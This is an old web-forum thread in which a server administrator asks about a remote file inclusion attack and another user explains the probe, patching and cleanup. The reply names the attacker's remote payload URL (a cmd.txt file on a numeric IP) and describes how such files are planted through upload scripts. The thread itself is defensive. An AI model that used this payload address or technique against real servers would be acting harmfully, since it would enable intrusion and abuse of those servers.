European Experts Exchange (EEE.org) :: Free Experts PHP MySql Oracle Microsoft Web SQL Delphi


Support :: Feedback :: remote file inclusion attack
By: pjssms	Date: 23/10/2007 20:32:03	Points: 0	Status: Answered Quality : Excellent
Hello, I would like to know more details about the attack from 85.17.116xxx I am the server admnistrator and I would like to fix the issue and prevent the situation. Thank you, Paulo Santos
By: VGR	Date: 26/10/2007 23:42:52		Type : Comment
hi, sorry for the delay in noticing your message. the 85.17.116.* machine is used to remotely test one server (this one) as vulnerable to RFI attacks, in order to use it for spamming or participating in DDoD attacks for sure. The attack (or probe) vector involves trying to reach a file situated on an other server ; in our case http://201.37.71.117:8090/cmd.txt that file was dropped in using other security holes, mainly permissive upload scripts, like in a lot of blog or forum packages. closing the hole on your side involves either patching your software for known RFI or "open http relay" vulnerabilities, or killing viral processes in case you got infected by a worm (sh*t happens and then it hits the fan) I don't have much more details to provide, because this server is invulnerable so far, but I'm willing to send you a list of people which said "we fixed the problem", so that you may contact them. You'll have an email soon. regards

Do register to be able to answer

©2010 These pages are served without commercial sponsorship. (No popup ads, etc...). Bandwidth abuse increases hosting cost forcing sponsorship or shutdown. This server aggressively defends against automated copying for any reason including offline viewing, duplication, etc... Please respect this requirement and DO NOT RIP THIS SITE.
Please DO link to this page! Post to Plurk Post to Yahoo Buzz Post to Delicious Post to Digg Post to MySpace Post to Ping.fm Post to Reddit Post to StumbleUpon

Contact

page generated in 334.470990 milliseconds

Why Google AdSense ads ?

New Improved Search!